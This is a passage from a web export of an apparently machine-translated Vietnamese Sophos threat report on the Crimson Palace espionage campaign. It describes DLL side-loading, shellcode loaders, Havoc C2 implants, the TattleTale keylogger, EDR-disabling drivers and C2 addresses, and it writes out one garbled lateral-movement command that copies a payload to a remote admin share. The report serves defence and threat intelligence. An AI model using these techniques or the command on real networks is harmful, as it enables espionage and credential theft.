tr\u01b0\u1eddng h\u1ee3p n\u00e0y, ch\u00fang \u0111\u00e3 ti\u00eam libcef.dll v\u00e0o WMIPrvSe.exe&nbsp;nh\u01b0 m\u1ed9t l\u1edbp che gi\u1ea5u kh\u00e1c. C\u00e1c l\u1ec7nh n\u00e0y d\u01b0\u1eddng nh\u01b0 l\u00e0 m\u1ed9t h\u00ecnh th\u1ee9c th\u1eed nghi\u1ec7m c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng.&nbsp;<\/p>\n\n\n\n<p>V\u00e0o th\u00e1ng 3, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 th\u1ef1c hi\u1ec7n th\u00eam c\u00e1c \u0111i\u1ec1u ch\u1ec9nh \u0111\u1ed1i v\u1edbi c\u00e1c b\u1ea3n c\u1ea5y gh\u00e9p. V\u00e0o \u0111\u1ea7u th\u00e1ng 3, t\u00e1c nh\u00e2n \u0111\u00e3 t\u1eadn d\u1ee5ng jconsole.exe \u0111\u1ec3 t\u1ea3i t\u1ec7p DLL \u0111\u1ed9c h\u1ea1i jli.dll (t\u00ean th\u1ef1c t\u1ebf:&nbsp;<a href=\"https:\/\/github.com\/florylsk\/ExecIT\">ExecIT.dll<\/a>&nbsp;, tr\u00ecnh t\u1ea3i m\u00e3 shell ExecIT). Sau khi t\u00e1c nh\u00e2n t\u1ea3i t\u1ec7p ExecIT, t\u1ec7p s\u1ebd ki\u1ec3m tra s\u1ef1 hi\u1ec7n di\u1ec7n c\u1ee7a t\u1ec7p log.ini trong c\u00f9ng th\u01b0 m\u1ee5c tr\u01b0\u1edbc khi \u0111\u1ecdc t\u1ec7p log.ini v\u00e0 \u0111\u01b0a t\u1ec7p n\u00e0y v\u00e0o b\u1ed9 nh\u1edb c\u1ee7a n\u00f3. Theo ph\u00e2n t\u00edch c\u1ee7a Sophos X-Ops, jli.dll c\u0169ng ki\u1ec3m tra c\u00e1c tr\u00ecnh g\u1ee1 l\u1ed7i kh\u00e1c nhau (scylla_x64.exe, ollydbg.exe, idaq64.exe, Zeta Debugger ho\u1eb7c IMMUNITYDEBUGGER.EXE) v\u00e0 c\u00e1c c\u00f4ng c\u1ee5 gi\u00e1m s\u00e1t v\u00e0 ph\u00e2n t\u00edch kh\u00e1c nhau (Unpacked.exe, reshacker.exe v\u00e0 c\u00e1c c\u00f4ng c\u1ee5 kh\u00e1c).&nbsp;<\/p>\n\n\n\n<p>&nbsp;Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 th\u1ea3 DLL \u0111\u01b0\u1ee3c t\u1ea3i b\u00ean ngo\u00e0i th\u00f4ng qua chuy\u1ec3n \u0111\u1ed9ng ngang t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb b\u1ecb x\u00e2m ph\u1ea1m kh\u00e1c v\u00e0 ph\u00e1t hi\u1ec7n ra r\u1eb1ng c\u1ea5y gh\u00e9p t\u1ea1o ra c\u00e1c k\u1ebft n\u1ed1i m\u1ea1ng ra ngo\u00e0i \u0111\u1ebfn 198.13.47.158:443 (\u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Nh\u1eadt B\u1ea3n). \u0110\u1ecba ch\u1ec9 IP n\u00e0y \u0111\u00e3 \u0111\u01b0\u1ee3c c\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda Cluster Charlie s\u1eed d\u1ee5ng tr\u01b0\u1edbc \u0111\u00f3 v\u00e0o th\u00e1ng 3 n\u0103m 2023 l\u00e0m C2 cho m\u1eabu c\u1eeda h\u1eadu PocoProxy.&nbsp;&nbsp;<\/p>\n\n\n\n<p>T\u00e1c nh\u00e2n \u0111e d\u1ecda di chuy\u1ec3n theo chi\u1ec1u ngang b\u1eb1ng c\u00e1ch sao ch\u00e9p c\u00e1c t\u1ec7p jconsole.exe, jli.dll v\u00e0 log.ini, sau \u0111\u00f3 t\u1ea1o m\u1ed9t t\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh t\u1eeb xa \u0111\u1ec3 th\u1ef1c thi t\u1ea3i tr\u1ecdng tr\u00ean c\u00e1c m\u00e1y m\u1ee5c ti\u00eau. Jconsole.exe \u0111\u01b0\u1ee3c quan s\u00e1t th\u1ea5y t\u1ea1o ra 131 l\u1ec7nh kh\u00e1m ph\u00e1, di chuy\u1ec3n theo chi\u1ec1u ngang v\u00e0 x\u00f3a ch\u1ec9 b\u00e1o kh\u00e1c nhau. Ngay sau \u0111\u00f3, ti\u1ebfn tr\u00ecnh jconsole.exe \u0111\u1ed9c \u200b\u200bh\u1ea1i \u0111\u01b0\u1ee3c th\u1ef1c thi t\u1eeb t\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh t\u1eeb xa v\u00e0 t\u1ea1o k\u1ebft n\u1ed1i IP tr\u1ef1c ti\u1ebfp \u0111\u1ebfn 198.13.47.158:443.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 chuy\u1ec3n sang tr\u00ecnh t\u1ea3i shellcode Donut m\u1ed9t l\u1ea7n n\u1eefa v\u00e0o ng\u00e0y 11 th\u00e1ng 3, m\u1ed9t l\u1ea7n n\u1eefa l\u1ea1m d\u1ee5ng jcef_helper.exe \u0111\u1ec3 t\u1ea3i m\u1ed9t&nbsp;b\u1ea3n sao Havoc C2 (libcef.dll) c\u00f9ng v\u1edbi t\u1ec7p log.bin. T\u1ec7p log.bin \u0111\u00f3ng vai tr\u00f2 l\u00e0 tr\u00ecnh k\u00edch ho\u1ea1t cho b\u1ea3n sao; shellcode ch\u1ec9 \u0111\u01b0a b\u1ea3n sao v\u00e0o v\u00e0 t\u1ea1o k\u1ebft n\u1ed1i \u0111\u1ebfn C2 c\u1ee7a t\u00e1c nh\u00e2n (IP 45.77.46.245:443, \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Singapore) khi log.bin c\u00f3 m\u1eb7t.&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 4 n\u0103m 2024: Tri\u1ec3n khai tin \u0111\u1ed3n&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 8 v\u00e0 12 th\u00e1ng 4, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 th\u1ef1c hi\u1ec7n ba l\u1ea7n t\u1ea3i ph\u1ee5 kh\u00e1c nhau b\u1eb1ng c\u00e1ch l\u1ea1m d\u1ee5ng th\u00e0nh ph\u1ea7n identity_helper.exe h\u1ee3p l\u1ec7 c\u1ee7a tr\u00ecnh duy\u1ec7t Edge \u0111\u1ec3 t\u1ea3i ph\u1ee5 c\u00e1c DLL \u0111\u1ed9c h\u1ea1i c\u00f3 t\u00ean l\u00e0 msedge_elf.dll. DLL n\u00e0y l\u00e0 tr\u00ecnh t\u1ea3i Donut mang t\u1ea3i tr\u1ecdng Havoc C2 d\u01b0\u1edbi d\u1ea1ng t\u1ec7p nh\u1ecb ph\u00e2n, t\u1ec7p n\u00e0y s\u1ebd \u0111\u01b0\u1ee3c \u0111\u01b0a v\u00e0o b\u1ed9 nh\u1edb khi gi\u1ea3i m\u00e3. Trong hai tr\u01b0\u1eddng h\u1ee3p, t\u1ea3i tr\u1ecdng Havoc \u0111i k\u00e8m \u0111\u00e3 \u0111\u01b0\u1ee3c m\u00e3 h\u00f3a \u0111\u00e3 \u0111\u01b0\u1ee3c g\u1eedi v\u00e0o C:\\Windows\\temp\\temp.log v\u00e0 \u0111\u01b0\u1ee3c k\u1ebft n\u1ed1i v\u1edbi m\u00e1y ch\u1ee7 C2 t\u1ea1i 64.176.37.107:443 (\u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Canada); trong m\u1ed9t tr\u01b0\u1eddng h\u1ee3p kh\u00e1c, n\u00f3 \u0111\u00e3 \u0111\u01b0\u1ee3c th\u1ea3 v\u00e0o c\u00f9ng m\u1ed9t v\u1ecb tr\u00ed v\u1edbi DLL c\u00f3 t\u00ean log.ini v\u00e0 \u0111\u01b0\u1ee3c k\u1ebft n\u1ed1i \u0111\u1ebfn 45.77.46.245:443 (\u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Hoa K\u1ef3).&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 10 th\u00e1ng 4, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 s\u1eed d\u1ee5ng m\u1ed9t jconsole.exe \u0111\u01b0\u1ee3c \u0111\u1ed5i t\u00ean kh\u00e1c, l\u1ea7n n\u00e0y \u0111\u1ed5i t\u00ean th\u00e0nh firefox.exe, trong m\u1ed9t n\u1ed7 l\u1ef1c t\u01b0\u01a1ng t\u1ef1 nh\u01b0 cu\u1ed9c t\u1ea5n c\u00f4ng ExecIT th\u00e1ng 3. Tr\u00ecnh t\u1ea3i shellcode trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y kh\u00f4ng \u0111\u01b0\u1ee3c ph\u1ee5c h\u1ed3i, nh\u01b0ng c\u1ea5y gh\u00e9p Havoc \u0111\u00e3 \u0111\u01b0\u1ee3c \u0111\u01b0a v\u00e0o firefox.exe v\u00e0 k\u1ebft n\u1ed1i \u0111\u1ebfn 64.176.37.107:443, gi\u1ed1ng nh\u01b0 hai trong s\u1ed1 nh\u1eefng l\u1ea7n \u0111\u01b0\u1ee3c \u0111\u01b0a v\u00e0o b\u1edfi tr\u00ecnh t\u1ea3i Donut \u0111\u00e3 l\u00e0m. V\u00e0o ng\u00e0y 12 th\u00e1ng 4, m\u1ed9t n\u1ed7 l\u1ef1c th\u1ee9 t\u01b0 \u0111\u1ec3 t\u1eadn d\u1ee5ng identity_helper.exe\u2014l\u1ea7n n\u00e0y \u0111\u01b0\u1ee3c \u0111\u1ed5i t\u00ean th\u00e0nh fireconf.exe\u2014\u0111\u00e3 b\u1ecb b\u1ea3o v\u1ec7 \u0111i\u1ec3m cu\u1ed1i c\u1ee7a Sophos ch\u1eb7n ngay l\u1eadp t\u1ee9c.&nbsp;<\/p>\n\n\n\n<p>C\u00f9ng th\u1eddi \u0111i\u1ec3m \u0111\u00f3, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 tri\u1ec3n khai m\u1ed9t bi\u1ebfn th\u1ec3 tr\u00ecnh t\u1ea3i shellcode c\u1ee7a msedge_elf.dll d\u01b0\u1edbi d\u1ea1ng m\u1ed9t t\u1ec7p th\u1ef1c thi \u0111\u1ed9c l\u1eadp (pp.exe).&nbsp;&nbsp;<\/p>\n\n\n\n<p>cmd \/c &#8220;sao ch\u00e9p c:\\users\\public\\temp.log \\\\172.xxx.xxx.xxx\\c$\\windows\\temp &amp;&amp; sao ch\u00e9p c:\\users\\public\\pp.exe\\\\172.xxx.xxx.xxx \\c$\\perflogs\\conhost.exe&#8221;&nbsp;<\/p>\n\n\n\n<p>C\u0169ng v\u00e0o \u0111\u1ea7u th\u00e1ng 4, ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y hai c\u00f4ng c\u1ee5 keylogger kh\u00e1c nhau \u0111\u01b0\u1ee3c tri\u1ec3n khai \u0111\u1ebfn c\u00f9ng m\u1ed9t m\u00e1y ch\u1ee7 c\u00f9ng m\u1ed9t l\u00fac, m\u1ed9t trong s\u1ed1 \u0111\u00f3 l\u00e0 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i ch\u01b0a \u0111\u01b0\u1ee3c b\u00e1o c\u00e1o tr\u01b0\u1edbc \u0111\u00f3 m\u00e0 ch\u00fang t\u00f4i \u0111\u1eb7t t\u00ean l\u00e0 TattleTale \u2014 m\u1ed9t keylogger c\u00f3 c\u00e1c kh\u1ea3 n\u0103ng b\u1ed5 sung. Ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y vi\u1ec7c s\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 n\u00e0y s\u1edbm nh\u1ea5t l\u00e0 v\u00e0o th\u00e1ng 8 n\u0103m 2023 nh\u01b0ng tr\u01b0\u1edbc \u0111\u00f3 kh\u00f4ng th\u1ec3 ch\u1ee5p \u0111\u01b0\u1ee3c m\u1eabu. C\u00e1c keylogger \u0111\u00e3 \u0111\u01b0\u1ee3c tri\u1ec3n khai \u0111\u1ebfn c\u00e1c t\u00e0i kho\u1ea3n ng\u01b0\u1eddi d\u00f9ng qu\u1ea3n tr\u1ecb m\u1ee5c ti\u00eau c\u1ee5 th\u1ec3 v\u00e0 c\u00e1c t\u00e0i kho\u1ea3n kh\u00e1c \u0111\u00e1ng quan t\u00e2m.&nbsp;<\/p>\n\n\n\n<p>TattleTale \u0111\u01b0\u1ee3c tri\u1ec3n khai d\u01b0\u1edbi d\u1ea1ng t\u1ec7p r2.exe v\u00e0 \u0111\u01b0\u1ee3c t\u1ea1o tr\u00ean \u0111\u0129a b\u1edfi identity_helper.exe. Theo ph\u00e2n t\u00edch c\u1ee7a Sophos X-Ops, ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i c\u00f3 th\u1ec3 l\u1ea5y d\u1ea5u v\u00e2n tay h\u1ec7 th\u1ed1ng b\u1ecb x\u00e2m ph\u1ea1m v\u00e0 ki\u1ec3m tra c\u00e1c \u1ed5 \u0111\u0129a v\u1eadt l\u00fd v\u00e0 m\u1ea1ng \u0111\u01b0\u1ee3c g\u1eafn k\u1ebft b\u1eb1ng c\u00e1ch m\u1ea1o danh ng\u01b0\u1eddi d\u00f9ng \u0111\u00e3 \u0111\u0103ng nh\u1eadp. TattleTale c\u0169ng thu th\u1eadp t\u00ean b\u1ed9 \u0111i\u1ec1u khi\u1ec3n mi\u1ec1n v\u00e0 \u0111\u00e1nh c\u1eafp Ch\u00ednh s\u00e1ch th\u00f4ng tin truy v\u1ea5n LSA (C\u01a1 quan b\u1ea3o m\u1eadt c\u1ee5c b\u1ed9), \u0111\u01b0\u1ee3c bi\u1ebft l\u00e0 ch\u1ee9a th\u00f4ng tin nh\u1ea1y c\u1ea3m li\u00ean quan \u0111\u1ebfn ch\u00ednh s\u00e1ch m\u1eadt kh\u1ea9u, c\u00e0i \u0111\u1eb7t b\u1ea3o m\u1eadt v\u00e0 \u0111\u00f4i khi l\u00e0 m\u1eadt kh\u1ea9u \u0111\u01b0\u1ee3c l\u01b0u trong b\u1ed9 nh\u1edb \u0111\u1ec7m. Kh\u1ea3 n\u0103ng ghi ph\u00edm c\u1ee7a TattleTale bao g\u1ed3m thu th\u1eadp d\u1eef li\u1ec7u l\u01b0u tr\u1eef v\u00e0 tr\u00ecnh duy\u1ec7t Edge v\u00e0 Chrome, l\u01b0u d\u1eef li\u1ec7u \u0111\u00e3 thu th\u1eadp n\u00e0y v\u00e0o t\u1ec7p .pvk \u0111\u01b0\u1ee3c \u0111\u1eb7t theo t\u00ean c\u1ee7a t\u1ed5 ch\u1ee9c n\u1ea1n nh\u00e2n. \u0110\u1ea7u ra c\u1ee7a ph\u1ea7n m\u1ec1m ghi ph\u00edm \u0111\u01b0\u1ee3c m\u00e3 h\u00f3a c\u1ee9ng v\u00e0o m\u1eabu, do \u0111\u00f3 th\u01b0 m\u1ee5c \u0111\u1ea7u ra c\u1ee7a n\u00f3 c\u00f3 kh\u1ea3 n\u0103ng thay \u0111\u1ed5i t\u00f9y theo t\u1eebng m\u1eabu.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-5-1024x570.png\" alt=\"\" class=\"wp-image-20416\"\/><figcaption class=\"wp-element-caption\"><em>H\u00ecnh 5: \u1ea2nh ch\u1ee5p m\u00e0n h\u00ecnh d\u00f2ng l\u1ec7nh ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i TattleTale<\/em><\/figcaption><\/figure>\n\n\n\n<p>C\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 tri\u1ec3n khai keylogger r1.exe c\u00f9ng v\u1edbi hai tr\u00ecnh \u0111i\u1ec1u khi\u1ec3n, C:\\users\\public\\rsndispot.sys v\u00e0 C:\\users\\public\\kl.sys, \u0111\u1ec3 t\u1ea1m th\u1eddi v\u00f4 hi\u1ec7u h\u00f3a d\u1eef li\u1ec7u t\u1eeb xa EDR. r1.exe \u0111\u01b0\u1ee3c th\u1ef1c thi b\u1edfi m\u1ed9t t\u1ec7p c\u00f3 t\u00ean 2.bat v\u00e0 thi\u1ebft l\u1eadp li\u00ean l\u1ea1c \u0111\u1ebfn m\u1ed9t \u0111\u1ecba ch\u1ec9 v\u00f2ng l\u1eb7p. Sau \u0111\u00f3, r1.exe truy c\u1eadp v\u00e0o c\u00e1c t\u1ec7p c\u01a1 s\u1edf d\u1eef li\u1ec7u \u0111\u01b0\u1ee3c b\u1ea3o v\u1ec7 c\u1ee7a Chrome.&nbsp;<\/p>\n\n\n\n<p>Tr\u00ean c\u00f9ng m\u1ed9t h\u1ec7 th\u1ed1ng qu\u1ea3n tr\u1ecb m\u1ee5c ti\u00eau, c\u00e1c t\u00e1c nh\u00e2n c\u0169ng tri\u1ec3n khai m\u1ed9t keylogger kh\u00e1c (&#8216;c:\\users\\public\\dd.dat&#8217;), \u0111\u1ea7u ra c\u1ee7a keylogger n\u00e0y s\u1ebd \u0111\u01b0\u1ee3c l\u01b0u d\u01b0\u1edbi d\u1ea1ng t\u1ec7p .dat (&#8216;C:\\Users\\Public\\log.dat&#8217;).&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 6 n\u0103m 2024: Cloudflared&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 13 th\u00e1ng 6, trong m\u1ed9t \u0111\u1ed9ng th\u00e1i kh\u00e1c g\u1ee3i nh\u1edb nhi\u1ec1u h\u01a1n \u0111\u1ebfn c\u00e1c cu\u1ed9c x\u00e2m nh\u1eadp c\u1ee7a t\u1ed9i ph\u1ea1m m\u1ea1ng, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 s\u1eed d\u1ee5ng Impacket \u0111\u1ec3 c\u00e0i \u0111\u1eb7t m\u00e1y kh\u00e1ch \u0111\u01b0\u1eddng h\u1ea7m Cloudflared tr\u00ean m\u1ed9t thi\u1ebft b\u1ecb duy nh\u1ea5t. Tr\u01b0\u1edbc khi c\u00e0i \u0111\u1eb7t, ch\u00fang \u0111\u00e3 c\u00f3 th\u1ec3 v\u00f4 hi\u1ec7u h\u00f3a d\u1eef li\u1ec7u t\u1eeb xa \u0111i\u1ec3m cu\u1ed1i t\u1eeb thi\u1ebft b\u1ecb m\u1ee5c ti\u00eau, do \u0111\u00f3 vi\u1ec7c tri\u1ec3n khai \u0111\u01b0\u1eddng h\u1ea7m kh\u00f4ng \u0111\u01b0\u1ee3c b\u00e1o c\u00e1o cho \u0111\u1ebfn khi ph\u1ea3n h\u1ed3i s\u1ef1 c\u1ed1 k\u00edch ho\u1ea1t l\u1ea1i b\u1ea3o v\u1ec7 \u0111i\u1ec3m cu\u1ed1i v\u00e0o cu\u1ed1i th\u00e1ng \u0111\u00f3.&nbsp;<\/p>\n\n\n\n<p><strong>K\u1ebft lu\u1eadn&nbsp;<\/strong><\/p>\n\n\n\n<p>C\u00e1c cu\u1ed9c x\u00e2m nh\u1eadp v\u00e0 ho\u1ea1t \u0111\u1ed9ng \u0111\u01b0\u1ee3c ghi l\u1ea1i trong b\u00e1o c\u00e1o n\u00e0y v\u1eabn ti\u1ebfp di\u1ec5n. Ch\u00fang t\u00f4i ti\u1ebfp t\u1ee5c th\u1ea5y c\u00e1c d\u1ea5u hi\u1ec7u c\u1ee7a c\u00e1c nh\u00f3m ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda m\u00e0 ch\u00fang t\u00f4i \u0111\u00e3 x\u00e1c \u0111\u1ecbnh trong b\u00e1o c\u00e1o ban \u0111\u1ea7u khi ch\u00fang c\u1ed1 g\u1eafng x\u00e2m nh\u1eadp v\u00e0o c\u00e1c m\u1ea1ng kh\u00e1c c\u1ee7a kh\u00e1ch h\u00e0ng Sophos trong c\u00f9ng khu v\u1ef1c.&nbsp;<\/p>\n\n\n\n<p>Trong su\u1ed1t qu\u00e1 tr\u00ecnh giao tranh, k\u1ebb th\u00f9 d\u01b0\u1eddng nh\u01b0 li\u00ean t\u1ee5c th\u1eed nghi\u1ec7m v\u00e0 tinh ch\u1ec9nh c\u00e1c k\u1ef9 thu\u1eadt, c\u00f4ng c\u1ee5 v\u00e0 ho\u1ea1t \u0111\u1ed9ng c\u1ee7a ch\u00fang. Khi ch\u00fang t\u00f4i tri\u1ec3n khai c\u00e1c bi\u1ec7n ph\u00e1p \u0111\u1ed1i ph\u00f3 v\u1edbi ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i t\u00f9y ch\u1ec9nh c\u1ee7a ch\u00fang, ch\u00fang k\u1ebft h\u1ee3p vi\u1ec7c s\u1eed d\u1ee5ng c\u00e1c c\u00f4ng c\u1ee5 do ch\u00fang ph\u00e1t tri\u1ec3n t\u00f9y ch\u1ec9nh v\u1edbi c\u00e1c c\u00f4ng c\u1ee5 chung, m\u00e3 ngu\u1ed3n m\u1edf th\u01b0\u1eddng \u0111\u01b0\u1ee3c c\u00e1c nh\u00e0 ki\u1ec3m tra x\u00e2m nh\u1eadp h\u1ee3p ph\u00e1p s\u1eed d\u1ee5ng, th\u1eed nghi\u1ec7m c\u00e1c k\u1ebft h\u1ee3p kh\u00e1c nhau.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Chi\u1ebfn d\u1ecbch gi\u00e1n \u0111i\u1ec7p m\u1ea1ng n\u00e0y \u0111\u00e3 \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n th\u00f4ng qua d\u1ecbch v\u1ee5 s\u0103n t\u00ecm m\u1ed1i \u0111e d\u1ecda do con ng\u01b0\u1eddi \u0111i\u1ec1u h\u00e0nh c\u1ee7a Sophos MDR, \u0111\u00f3ng vai tr\u00f2 quan tr\u1ecdng trong vi\u1ec7c ch\u1ee7 \u0111\u1ed9ng x\u00e1c \u0111\u1ecbnh ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda. Ngo\u00e0i vi\u1ec7c t\u0103ng c\u01b0\u1eddng ho\u1ea1t \u0111\u1ed9ng c\u1ee7a MDR, d\u1ecbch v\u1ee5 s\u0103n t\u00ecm m\u1ed1i \u0111e d\u1ecda MDR c\u00f2n \u0111\u01b0a v\u00e0o \u0111\u01b0\u1eddng \u1ed1ng ph\u00e2n t\u00edch ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i X-Ops c\u1ee7a ch\u00fang t\u00f4i \u0111\u1ec3 cung c\u1ea5p kh\u1ea3 n\u0103ng b\u1ea3o v\u1ec7 v\u00e0 ph\u00e1t hi\u1ec7n \u0111\u01b0\u1ee3c c\u1ea3i ti\u1ebfn.&nbsp;<\/p>\n\n\n\n<p>Cu\u1ed9c \u0111i\u1ec1u tra v\u1ec1 chi\u1ebfn d\u1ecbch n\u00e0y ch\u1ee9ng minh t\u1ea7m quan tr\u1ecdng c\u1ee7a m\u1ed9t chu tr\u00ecnh t\u00ecnh b\u00e1o hi\u1ec7u qu\u1ea3, ph\u00e1c th\u1ea3o c\u00e1ch th\u1ee9c m\u1ed9t cu\u1ed9c s\u0103n l\u00f9ng m\u1ed1i \u0111e d\u1ecda xu\u1ea5t ph\u00e1t t\u1eeb m\u1ed9t ph\u00e1t hi\u1ec7n gia t\u0103ng c\u00f3 th\u1ec3 t\u1ea1o ra th\u00f4ng tin t\u00ecnh b\u00e1o \u0111\u1ec3 ph\u00e1t tri\u1ec3n c\u00e1c ph\u00e1t hi\u1ec7n m\u1edbi v\u00e0 kh\u1edfi \u0111\u1ed9ng c\u00e1c cu\u1ed9c s\u0103n l\u00f9ng b\u1ed5 sung.&nbsp;<\/p>\n\n\n\n<p>C\u00e1c ch\u1ec9 s\u1ed1 v\u1ec1 s\u1ef1 x\u00e2m ph\u1ea1m cho ho\u1ea1t \u0111\u1ed9ng Crimson Palace b\u1ed5 sung n\u00e0y c\u00f3 s\u1eb5n tr\u00ean trang GitHub c\u1ee7a Sophos&nbsp;<a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/crimson_palace_2.csv\">t\u1ea1i \u0111\u00e2y<\/a>&nbsp;.&nbsp;\u0110\u1ec3 c\u00f3 c\u00e1i nh\u00ecn s\u00e2u s\u1eafc v\u1ec1 cu\u1ed9c s\u0103n l\u00f9ng m\u1ed1i \u0111e d\u1ecda \u0111\u1eb1ng sau chi\u1ebfn d\u1ecbch gi\u00e1n \u0111i\u1ec7p m\u1ea1ng k\u00e9o d\u00e0i g\u1ea7n hai n\u0103m n\u00e0y, h\u00e3y \u0111\u0103ng k\u00fd tham gia h\u1ed9i th\u1ea3o tr\u1ef1c tuy\u1ebfn, \u201c&nbsp;<a href=\"https:\/\/events.sophos.com\/operation-crimson-palace\/\">Intrigue of the Hunt: Operation Crimson Palace: V\u1ea1ch tr\u1ea7n m\u1ed9t chi\u1ebfn d\u1ecbch do nh\u00e0 n\u01b0\u1edbc t\u00e0i tr\u1ee3 nhi\u1ec1u \u0111\u1ea7u<\/a>&nbsp;\u201d. &nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Chi\u1ebfn d\u1ecbch gi\u00e1n \u0111i\u1ec7p m\u1ea1ng c\u1ee7a Trung Qu\u1ed1c ti\u1ebfp t\u1ee5c n\u1ed7 l\u1ef1c trong nhi\u1ec1u t\u1ed5 ch\u1ee9c \u1edf \u0110\u00f4ng Nam \u00c1, k\u1ebft h\u1ee3p c\u00e1c chi\u1ebfn thu\u1eadt v\u00e0 m\u1edf r\u1ed9ng n\u1ed7 l\u1ef1c&nbsp; \u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi&nbsp;Mark Parsons&nbsp;,&nbsp;Morgan Demboski&nbsp;,&nbsp;Sean Gallagher Ng\u00e0y 10 th\u00e1ng 9 n\u0103m 2024 Sau m\u1ed9t th\u1eddi gian ng\u1eafn t\u1ea1m ng\u1eebng ho\u1ea1t \u0111\u1ed9ng, Sophos X-Ops ti\u1ebfp t\u1ee5c [&hellip;]<\/p>\n","protected":false},"author":13,"featured_media":20568,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"